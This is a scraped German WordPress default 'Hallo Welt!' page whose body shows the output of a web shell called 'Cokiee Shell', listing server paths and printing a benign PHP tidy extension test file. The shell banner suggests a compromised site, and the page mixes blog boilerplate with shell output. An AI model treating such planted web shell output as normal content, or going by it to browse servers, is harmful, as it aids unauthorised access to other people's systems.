Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/tidy/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/tidy/tests/bug_50558.phpt |
--TEST-- Bug #50558 - Broken object model when extending tidy --SKIPIF-- <?php if (!extension_loaded("tidy")) print "skip"; ?> --FILE-- <?php class MyTidy extends tidy { // foo } function doSomething(MyTidy $o) { var_dump($o); } $o = new MyTidy(); var_dump($o instanceof MyTidy); doSomething($o); ?> --EXPECTF-- bool(true) object(MyTidy)#%d (%d) { ["errorBuffer"]=> NULL ["value"]=> NULL }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare